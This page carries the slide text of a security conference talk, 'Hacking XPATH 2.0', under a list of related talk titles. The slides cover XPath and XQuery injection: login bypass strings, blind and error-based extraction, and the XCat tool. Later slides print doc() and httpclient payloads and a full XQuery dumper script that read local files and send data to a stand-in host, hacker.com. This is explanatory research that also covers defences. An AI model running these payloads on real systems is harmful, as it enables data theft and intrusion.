Nitin Mishra 0301EC201039 Internship PPT.pptx
Nitin Mishra 0301EC201039 Internship PPT.pptxNitin Mishra 0301EC201039 Internship PPT.pptx
Nitin Mishra 0301EC201039 Internship PPT.pptx
 
Concurrency and Thread-Safe Data Processing in Background Tasks
Concurrency and Thread-Safe Data Processing in Background TasksConcurrency and Thread-Safe Data Processing in Background Tasks
Concurrency and Thread-Safe Data Processing in Background Tasks
 
C Sharp Course 101.5
C Sharp Course 101.5C Sharp Course 101.5
C Sharp Course 101.5
 

More from michelemanzotti

Attacking IPv6 Implementation Using Fragmentation
Attacking IPv6 Implementation Using FragmentationAttacking IPv6 Implementation Using Fragmentation
Attacking IPv6 Implementation Using Fragmentationmichelemanzotti
 
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...michelemanzotti
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfacesmichelemanzotti
 
GDI Font Fuzzing in Windows Kernel For Fun
GDI Font Fuzzing in Windows Kernel For Fun GDI Font Fuzzing in Windows Kernel For Fun
GDI Font Fuzzing in Windows Kernel For Fun michelemanzotti
 
Lotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the ControllerLotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the Controllermichelemanzotti
 
Lotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the ControllerLotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the Controllermichelemanzotti
 
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?michelemanzotti
 
Federate Identity and Access Management
Federate Identity and Access ManagementFederate Identity and Access Management
Federate Identity and Access Managementmichelemanzotti
 
Simple Network Management Protocol
Simple Network Management ProtocolSimple Network Management Protocol
Simple Network Management Protocolmichelemanzotti
 
Sistema Federato Interregionale di Autenticazione
Sistema Federato Interregionale di AutenticazioneSistema Federato Interregionale di Autenticazione
Sistema Federato Interregionale di Autenticazionemichelemanzotti
 
L'impatto dei Servizi Applicativi
L'impatto dei Servizi ApplicativiL'impatto dei Servizi Applicativi
L'impatto dei Servizi Applicativimichelemanzotti
 

More from michelemanzotti (11)

Attacking IPv6 Implementation Using Fragmentation
Attacking IPv6 Implementation Using FragmentationAttacking IPv6 Implementation Using Fragmentation
Attacking IPv6 Implementation Using Fragmentation
 
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...
 
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web InterfacesThey Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
They Ought to Know Better: Exploiting Security Gateways via Their Web Interfaces
 
GDI Font Fuzzing in Windows Kernel For Fun
GDI Font Fuzzing in Windows Kernel For Fun GDI Font Fuzzing in Windows Kernel For Fun
GDI Font Fuzzing in Windows Kernel For Fun
 
Lotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the ControllerLotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the Controller
 
Lotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the ControllerLotus Domino: Penetration Through the Controller
Lotus Domino: Penetration Through the Controller
 
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
Cyber-Attacks & SAP systems: Is Our Business-Critical Infrastructure Exposed?
 
Federate Identity and Access Management
Federate Identity and Access ManagementFederate Identity and Access Management
Federate Identity and Access Management
 
Simple Network Management Protocol
Simple Network Management ProtocolSimple Network Management Protocol
Simple Network Management Protocol
 
Sistema Federato Interregionale di Autenticazione
Sistema Federato Interregionale di AutenticazioneSistema Federato Interregionale di Autenticazione
Sistema Federato Interregionale di Autenticazione
 
L'impatto dei Servizi Applicativi
L'impatto dei Servizi ApplicativiL'impatto dei Servizi Applicativi
L'impatto dei Servizi Applicativi
 

Recently uploaded

Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESmohitsingh558521
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersRaghuram Pandurangan
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 

Recently uploaded (20)

Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICESSALESFORCE EDUCATION CLOUD | FEXLE SERVICES
SALESFORCE EDUCATION CLOUD | FEXLE SERVICES
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Generative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information DevelopersGenerative AI for Technical Writer or Information Developers
Generative AI for Technical Writer or Information Developers
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 

Hacking XPATH 2.0

  • 1. Hacking  XPATH  2.0     Tom  Forbes   Sumit  Siddharth   7Safe,  UK    
  • 2. Who  Are  We..   –  Sumit  ‘sid’  Siddharth   •  Head  of  PenetraCon  TesCng  at  7Safe   •  Specialist  in  applicaCon  and  database  security   •  Speaker  at  Black  Hat,  DEF  CON  2009,  2010,   2011     •  Co-­‐author  of  book  SQL  InjecCon,  ATacks  and   Defense  (2nd  ediCon)  
  • 3. Who  Are  We..   –  Tom  Forbes   •  First  year  University  student     •  Summer  Intern  at  7safe   •  Loves  to  code!  
  • 4. XPATH:  WHAT  IS  IT?        
  • 5. What  is  it?   •  Query  language  for  selecCng  nodes  in  an  XML   document   –  Think  SQL  for  XML   •  Two  versions   –  1.0  released  November  1999   –  2.0  released  December  2010  
  • 6. XPATH’s  XML  Nomenclature   Root  node   Node   Node  value   Comment   Node   Node  name   ATribute  name   ATribute  value  
  • 7. Why  use  it?   •  XPath  allows  you  to  write  complex  queries   based  upon  pracCcally  anything  in  the  XML   dataset  (aTributes,  children,  other  nodes)   –  Which  allows  you  to  do  stuff  like  unions  and  joins   •  Lots  of  funcCons  for  date,  string  and  number   manipulaCon   –  XPath  2.0  brings  lots  of  new  funcCons  
  • 8. Examples   •  Return  nodes  based  on  their  children   /Employees/Employee[UserName=‘jbravo’] –  Returns  the  first  employee  in  our  example  (Johnny  Bravo)   •  Return  nodes  based  on  aTributes   /Employees/Employee[@ID=‘2’] –  Returns  the  second  Employee  in  our  database    
  • 9. Examples   •  Contextual  queries   /Employees/Employee[string-length(FirstName) > 10] –  Returns  all  employees  with  long  first  names   /Employees/Employee[position()<=5] –  Returns  the  first  5  employees   •  FuncCons   Avg(/Employees/Employee/Age) –  Returns  the  average  employee  age   –  Other  funcCons  include  count,  max,  min,  sum    
  • 11. XPATH  InjecCon   •  Un-­‐validated  users  input  used  in  XPATH  query   •  The  XPATH  query  can  be  altered  to  achieve:   –  AuthenCcaCon  bypass   –  Business  logic  bypass   –  ExtracCon  of  arbitrary  data  from  the  xml  database  
  • 12. AuthenCcaCon  Bypass   •  AuthenCcaCon  Bypass   –  string(//Employee[username/text()=‘jbravo'  and   password/text()=‘pass123']/account/text())     –  string(//Employee[username/text()=‘jbravo'  or  '1'   =  '1'  and  password/text()=‘anything']/account/ text())     •  Username=‘jbravo’  or  [TRUE  and  FALSE]   –  XPATH  does  not  have  any  comment  characters  
  • 13. Demo  1   •  AuthenCcaCon  Bypass  
  • 14. AuthenCcaCon  Bypass  2   •  Oken  password  is  saved  in  encrypted  format   –  string(//Employee[username/text()=‘jbravo'  and   password/ text()=‘5f4dcc3b5aa765d61d8327deb882cf99']/ account/text())     –  Password  field  is  not  vulnerable   –  What  if  we  don’t  know  a  valid  username:  
  • 15. AuthenCcaCon  Bypass  2...   •  string(//Employee[username/text()=‘non_exisCng’  or   ‘1’=‘1'  and  password/ text()=‘5f4dcc3b5aa765d61d8327deb882cf99']/ account/text())     •  Username=‘non_exisCng’  OR  [TRUE  AND  FALSE]   •  Username=‘non_exisCng’  or  False   •  FALSE  or  FALSE   •  FAIL!  
  • 16. AuthenCcaCon  Bypass  2   •  string(//Employee[username/text()=‘non_exisCng’  or   ‘1’=‘1’  or  ‘1’=‘1'  and  password/ text()=‘5f4dcc3b5aa765d61d8327deb882cf99']/ account/text())     •  Username=‘non_exisCng’  OR  TRUE  OR    TRUE  AND   FALSE   •  Username=‘non_exisCng’  or  TRUE  or  [TRUE  AND   FALSE]   •  FALSE  or  TRUE  or  FALSE   •  TRUE!  
  • 17. Blind     XPATH  InjecCon   •  Same  logic  and  SQL  InjecCon   •  True  and  False  pages   •  /Employees/Employee[UserName=‘jbravo'   and  '1'='1'  and  Password=‘mypass’]   –  True  page   •  /Employees/Employee[UserName=‘jbravo'   and  '1'='2'  and  Password=‘mypass’]   –  False  page  
  • 18. ExploiCng  it   •  No  concept  of  a  user   •  No  concept  of  a  permission   •  No  security  whatsoever   •  Sweet.  
  • 19. Useful  funcCons   •  count(<node_reference>)   –  Returns  number  of  child  available   •  name(<node_name>)   –  Returns  the  node  name  (e.g.  <firstname>   •  string-­‐length(name(<node_name>))   –  Returns  the  length  of  node  name  (<firstname>=9)     •  substring(name(<node_name>),<posiCon>,<1>)   –  returns  the  characters  from  the  posiCon  in  the  string  
  • 20. XML  crawling  [1]   Name  of  the  root  node:   name(/*[1])=‘Employees’   Total  number  of  child  nodes:   count(/*[1]/*[1]/*)=6  
  • 21. XML  crawling  [2]   Find  the  aTribute  name   Finding  child  node  names   name(/*[1]/*[1]/@*[1])=‘ID’   name(/*[1])/*[1])=‘Employee’   Find  the  aTribute  value   Substring(/*[1]/*[1]/@*[1],1,1)=‘1’   Finding  the  value,  if  it  does  not  have  a  child   substring(/*[1]/*[1]/*[1],1,1)=‘J'  
  • 22. True  And  False  scenario   •  hTp://host/test03.php?username=abaker'  and  '1'='1   –  True  Response   –  /Office/Employee[UserName='abaker‘  and  ‘1’=‘1’]   •  hTp://host/test03.php?username=abaker'  and  '1'=‘2   –  False  Response   •  hTp://host/test03.php?username=abaker'  and  name(/ *[1])=‘EMPLOYEES’  and  '1'='1          response:  True   –  True  Response  means  there  the  root  node  name  is   EMPLOYEES  
  • 23. Reading  comments  within  XML  file   •  Read  the  comments  from  the  XML  file:   •  hTp://host/?username=abaker'  and  /*[1]/ comment()='comment'    and  '1'='1  
  • 24. AutomaCng  XPATH  InjecCon   1.  Get  the  name  of  the  node  we  are  fetching   2.  Count  the  aTributes  of  the  node   3.  For  each  aTribute:   a)  Get  the  name   b)  Get  the  value   4.  Retrieve  the  comment  (if  it  exists)   5.  Count  the  number  of  child  nodes   6.  For  each  child  node:   a)  Go  to  step  #1   7.  Get  the  nodes  text  content  
  • 25. XCat   •  XCat  retrieves  XML  documents  through  blind   XPath  injecCon  vulnerabiliCes   –  WriTen  in  Python   –  Uses  all  the  techniques  described  in  this  talk   –  Designed  to  be  fast   –  Supports  XPath  2.0  features  where  possible   •  More  on  it  later!  
  • 26. DEMO  2   •  Xcat:  Downloading  the  xml  database  
  • 28. XPATH  2.0   •  New  addiCon   •  Lot  more  funcCons   •  Lot  more  fun!  
  • 29. XPATH  2.0  features..   •  Hugely  increased  feature  set   –  Regular  expressions   –  CondiConals  and  programmaCc  errors     •  allows  blind  error-­‐based  aTacks   –  Overhauled  type  system  (19  types  instead  of  4)   –  Unicode  normalizaCon   –  String  to  code  point  conversion   –  Remote  document  references   •  All  of  these  can  be  uClized  to  speed  up  document   retrieval  and  reduce  the  key  space  we  have  to   search.  
  • 30. XPATH  2.0  features..   •  Regular  expressions:   matches(string, pattern) •  We  can  use  it  to  see  if  a  string  contains  a  set   of  characters  before  we  begin  retrieval   matches(/Employees/Employee[1]/FirstName/text(), "[A-Z]")
  • 31. XPATH  2.0  features..   •  Unicode  normalizaCon   –  Breaks  down  (some)  Unicode  characters  into  their   composing  characters.   normalize-unicode(‘é’, "NFKD") -> ‘e`’ –  Speeds  up  document  retrieval  as  unicode  code-­‐ spaces  do  not  have  to  be  searched,  however  data   may  be  lost  as  some  characters  cannot  be   normalized.  
  • 32. XPath  2.0   •  String  codepoints   String-to-codepoints(“hello”) =(104,101,108,108,111) –  Speeds  up  retrieval,  you  can  just  binary-­‐chop   through  your  specified  range  rather  than  tesCng   each  character  against  every  value  in  the  range  
  • 33. Checking  XPATH  Version   •  Figure  out  what  version  of  XPath  the  target  is   running:   lower_case(‘A’) == ‘a’ –  FuncCon  introduced  in  XPath  2.0,  will  fail  on  sokware  that   doesn’t  support  XPath  2.0.  
  • 34. Reducing  the  keyspace   •  Blind  injecCons  are  slow   –  Keyspaces  can  be  huge,  with  unicode  they  can  be   impossibly  large  to  search   –  Searching  this  is  Cme  consuming.   •  XPath  1.0  doesn’t  have  any  funcCons  we  can  use  to   reduce  the  key  space   •  XPath  2.0  has  loads.  
  • 35. XPath  2.0   •  CondiConals   –  XPath  2.0  has  an  error()  funcCon  we  can  use  to  do   error-­‐based  blind  aTacks:   ' and (if ($payload) then error() else 0) and '1' = '1
  • 36. Why  we  need  an  error  condiCon   •  Think  of  it  like  Cme  based  SQL  InjecCon   •  ApplicaCon  does  not  return  TRUE  AND  FALSE   pages   –  But  returns  an  error  page  when  the  XPATH  syntax   is  wrong   –  The  FALSE  condiCon  is  now  the  error  page   –  It  does  not  have  to  be  a  xPath  error,  a  generic   error  page  or  string  will  work!  
  • 37. DEMO  3   •  Error  based  extracCon  
  • 38. QuesCon   •  Can  we  do  something  similar  in  XPATH  1.0?  
  • 39. THE  DOC()  FUNCTION......   THE  TROUBLE  STARTS  HERE......  
  • 40. The  doc()  funcCon   •  Allows  you  to  reference  documents  on  the   file-­‐system   –  Lets  you  do  “cross  file”  joins   –  Also  lets  you  read  arbitrary  XML  file  on  the  system  both   locally  or  remote  and  use  them  inside  expressions:   • count(doc("http://twitter.com/crossdomain.xml”)/*) • doc(“file:///etc/conf/my_config_file.xml”)/*[1]/text()
  • 41. The  doc()  funcCon   •  This  is  great  for  an  aTacker  in  two  ways:   –  They  can  read  any  parseable  XML  file  on  the  file   system  such  as:   •  Java  config  files   •  Other  XML  databases  
  • 42. DEMO  4   •  Xcat:  Reading  arbitrary  local  XML  files  
  • 43. More  fun  with  the  doc()  funcCon   –  We  can  make  the  vulnerable  server  issue  GET   requests  to  aTacker’s  web  server  with  data  from   arbitrary  xml  on  vulnerable  host   •  This  can  be  used  to  speed  up  document  retrieval   •  Make  it  connect  to  our  HTTP  server  and  submit  the   contents  of  XML  document   –  Think  of  it  like  OOB  SQL  InjecCon  exploitaCon  
  • 44. The  doc()  funcCon  -­‐  HTTP   doc(concat( “http://hacker.com/savedata.py?username=”, encode-for-uri(//Employee[1]/UserName), “&password=“, encode-for-uri(//Employee[1]/Password) ))
  • 45. The  doc()  funcCon  -­‐  HTTP       1.  XPath   Target   injecCon  with   doc()  payload   ATacker   Series  of   Tubes   3.  HTTP  request  from   2.  Target  server  processes   target  server  containing   the  payload  and  aTempts   data  from  the  database   to  load  the  HTTP  resource   ATacker’s    Web   server  
  • 46. The  doc()  funcCon   •  Can  be  used  to  retrieve  the  whole  document   very  quickly   –  Only  limit  is  the  max  size  of  a  GET  request  that  the   HTTP  server  accepts   •  Not  always  available  due  to  firewall  rules  or   explicit  disabling  in  the  code    
  • 47. The  doc()  funcCon  -­‐  DNS   doc(concat(“http://”, encode-for-uri(//Employee[1]/UserName), “.”, encode-for-uri((//Employee[1]/Password), “.hacker.com”))
  • 48. The  doc()  funcCon  -­‐  DNS       1.  XPath  injecCon  with   doc()  DNS  payload   Target   ATacker   Series  of   Tubes   3.  The  DNS  request  is  read   2.  Target  server  processes   and  logged  by  the  name   the  payload  and  aTempts   server  –  the  first  secCon  is   to  resolve  the  domain   ATackers  nameserver   the  username  and  the  last  is   name   the  password  
  • 49. The  doc()  funcCon  -­‐  DNS   •  Some  firewalls  may  block  outbound  port   80/443   •  Usually  the  DNS  traffic  is  allowed   •  Some  limitaCons   –  Domain  name  size  limit   –  Character  limitaCons   –  DNS  query  might  get  lost  in  transit  
  • 50. DNS:  data  ex-­‐filtraCon    doc(concact(  //Employee[1]/ UserName,“.hacker.com”))   •  Will  result  in  a  DNS  query:   –  15:19:04.996744  IP  X.X.X.X.38353  >  Y.Y.Y.Y.53:   15310  A?  jbravo.hacker.com.    
  • 51. XQuery   •  Query  And  a  programming  language   •  Super  set  of  Xpath   •  Uses  Xpath  expression   •  Supports  FLWOR  expression   –  FOR   –  LET   –  WHERE   –   ORDER  BY   –   RETURN  
  • 52. XQuery  InjecCon   •  Similar  to  XPath  injecCon   •  ApplicaCon  uses  un-­‐validated  input  in  XQuery   to  query  one  or  more  xml  database   •   More  fun  
  • 54. xQuery  Dumper  Script   for  $n  in  /*[1]/*    let  $x  :=  for  $aT  in  $n/@*     return  (concat(name($aT),"=",encode-­‐for-­‐uri($aT)))    let  $y  :=  doc(concat("hTp://hacker.com/?name=",                                                                                                            encode-­‐for-­‐uri(name($n)),                    "&amp;data=",                    encode-­‐for-­‐uri($n/text()),                "&amp;aTr_",                  string-­‐join($x,"&amp;aTr_")))          for  $c  in  $n/child::*      let  $x  :=  for  $aT  in  $c/@*                                                                                                                  return  (concat(name($c),"=",encode-­‐for-­‐uri($c)))      let  $y  :=  doc(concat("hTp://hacker.com/?child=1&amp;name=",                                                                                                                                        encode-­‐for-­‐uri(name($c)),                                                                                                                                        "&amp;data=",                                                                                                                                        encode-­‐for-­‐uri($c/text()),                                                                                                                                      "&amp;aTr_",                                                                                                                                      string-­‐join($x,"&amp;aTr_")))    
  • 55. One  Query  to  get  them  all...   •  hTp://localhost/viewposts?username=admin%27%5D%0Afor+%24n+in+%2F%2A%5B1%5D%2F%2A%0A%09let+ %24x+%3A%3D+for+%24aT+in+%24n%2F%40%2A+%0A%09%09return+%28concat%28name%28%24aT%29%2C %27%3D%27%2Cencode-­‐for-­‐uri%28%24aT%29%29%29%0A%09let+%24y+%3A%3D+doc%28concat%28%27hTp %3A%2F%hacker.com%2F%3Fname%3D%27%2C+%0A++++++++++++++++++++++++++++++++++++++++++++++++ ++++encode-­‐for-­‐uri%28name%28%24n%29%29%2C+%0A++++++++%27-­‐data%3D%27%2C+%0A++++++++encode-­‐ for-­‐uri%28%24n%2Ftext%28%29%29%2C%0A+++++++%27-­‐aTr_%27%2C+%0A+++++++string-­‐join%28%24x%2C %27-­‐aTr_%27%29%29%29%0A%09%09%0A%09for+%24c+in+%24n%2Fchild%3A%3A%2A%0A%09%09let+%24x+ %3A%3D+for+%24aT+in+%24c%2F%40%2A+%0A+++++++++++++++++++++++++++++++++++++++++++++++++++++ ++return+%28concat%28name%28%24c%29%2C%27%3D%27%2Cencode-­‐for-­‐uri%28%24c%29%29%29%0A %09%09let+%24y+%3A%3D+doc%28concat%28%27hTp%3A%2F%2Fhacker.com%2F%3Fchild%3D1-­‐name%3D %27%2C+%0A++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++encode-­‐for-­‐uri %28name%28%24c%29%29%2C+%0A++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++%27-­‐data%3D%27%2C+%0A+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +encode-­‐for-­‐uri%28%24c%2Ftext%28%29%29%2C%0A++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++%27-­‐aTr_%27%2C%0A+++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++string-­‐join%28%24x%2C%27-­‐aTr_%27%29%29%29%0Alet+%24x+%3A%3D+%2F%2A%5B%27  
  • 57. LimitaCons  of  xQuery  injecCon   •  Depends  upon  parser   •  SAXON  parser  wont  entertain  our  one  query   to  get  them  all!   –  Lazy  evaluaCon   •  We  can  rely  on  the  xPath  injecCon  techniques   –  Blind   –  Error  based   –  Out-­‐of-­‐band  channels      
  • 58. eXist-­‐DB   •  NaCve  XML  database   •  Queries  issued  via  HTTP:   –  hTp://localhost:8080/exist/rest/db/DATABASE/?_query=QUERY   •  We  can  issue  database  calls  within  XPath   expressions  using  the  doc()  funcCon  and  read   the  results  
  • 59. eXist-­‐DB              Doc(                      concat(“hTp://localhost:8080/exist/rest/db/mydb?_query=”,        encode-­‐for-­‐uri(“doc(‘file:///home/exist/database/conf.xml’)”)                                              )    )   •  This  would  cause  eXist-­‐DB  to  read  its  config  file  and   return  it  as  a  nodeset  which  we  can  manipulate  in   our  query.  
  • 60. eXist-­‐DB   •  Ships  with  lots  of  useful  modules,  including:   –  HTTP  Client  (enabled  by  default)   –  Email  module   –  LDAP  client   –  Oracle  PL/SQL  stored  procedure  executer   –  File  system  access  
  • 61. eXist-­‐DB   •  The  HTTP  module  is  enabled  by  default   –  Lets  you  issue  GET  and  POST  requests  from  within   our  query   HTpclient:post(xs:anyURI(“hTp://aTacker.com/”),/*,  false(),  ())  
  • 64. ProtecCng  against  XPath  aTacks   •  Same  old!   –  SaniCze  user  input  (duh)   •  Do  you  really  want  me  to  explain  this!   –  Parameterized    queries   •  Separate  data  from  code   •  /root/element[@id=$ID]   –  Limit  the  doc()  funcCon  
  • 65. Thank  You   •  QuesCons   •  Contact:   sid@pentest.7safe.com   tom@pentest.7safe.com     www.7safe.com